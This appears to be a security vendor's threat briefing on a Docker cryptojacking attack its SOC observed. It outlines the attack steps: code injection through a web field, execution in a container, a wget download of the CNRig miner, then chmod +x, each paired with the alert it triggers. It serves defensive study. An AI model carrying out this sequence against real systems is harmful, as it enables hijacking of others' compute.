eBooks & Reports

InsideADockerCrypto_Whitepaper_Final

Issue link: https://resources.threatstack.com/i/1054718

Contents of this Issue

Navigation

Page 0 of 1

C L O U D S E C U R I T Y T H R E A T B R I E F I N G Inside a Docker Cryptojacking Exploit Containers are useful tools for managing the applica on development-deployment lifecycle, but they are not a security tool. Docker builds on lower-level features of the host opera ng system that define which processes can see each other, and which compute resources they can each access. But containers are s ll sharing host resources underneath, and higher up the stack complica ons can arise from the privileges and configura on parameters operators (or, poten ally, bad actors) use to launch containers at run me. Like adop ng any new tool, it's a balancing act between addressing security considera ons and moving fast. The Threat Stack Cloud Security Pla orm ® provides high-fidelity security signals for observing operator behavior on infrastructure running across your environment — from host servers, containers, orchestra on, and their admin control planes. In addi on to our customer onboarding process, we offer ongoing services in the form of the Threat Stack Cloud SecOps Program℠, where analysts in our Security Opera ons Center (SOC) triage alerts and inves gate security events on customers' behalfs. The Threat Stack SOC gives us a unique perspec ve on trending exploits in the field. One trend we are seeing more and more of is around cryptojacking and is outlined below in a set of anonymized adversarial behaviors. The command is sent through the applica on layer, typically sending the malicious code by manipula ng a text field on a website or an API endpoint exposed in the site's URL — or by probing an embedded shell console commonly found on code reference websites. The injected code filters down to the opera ng system and is translated to the container environment on the back end. The back end spins up the container and prepares to execute the injected code. In the recent trends observed by Threat Stack SOC analysts, a ackers then pass commands directly to the shell within a Docker container. While restricted to the container's reduced view of the host opera ng system, the a acker can now arbitrarily run untrusted code. The following series of events occurred all within seconds of each other, and were monitored in near-real- me by analysts in our SOC. The speed of these transac ons indicates a scrip ng a ack versus a hands-on-keyboard approach. The first step was to run a wget command to download the cryptomining executable, CNRig. S T E P 1 S T E P 2 S T E P 3 Identify a website vulnerable to remote code injection Launch container and the injected code runs inside it Download the cryptomining executable to the local filesystem Stepping Through the Attack THREAT STACK ALERT Possible data download is a user behavior that typically triggers a Sev 2 alert in Threat Stack. Here, the a acker changes permissions on the CNRig executable, gaining the ability to run this file without addi onal authen ca on. In containers that are normally designed to run as immutable components in a microservices architecture, this event is a strong signal that something is wrong and a good candidate for aler ng in Threat Stack. S T E P 4 Modify permissions, chmod +x THREAT STACK EVENT An operator changing permissions at run me is an important security event to observe, adding context to digital forensics that our analysts used to trace the path of this exploit.

Articles in this issue

view archives of eBooks & Reports - InsideADockerCrypto_Whitepaper_Final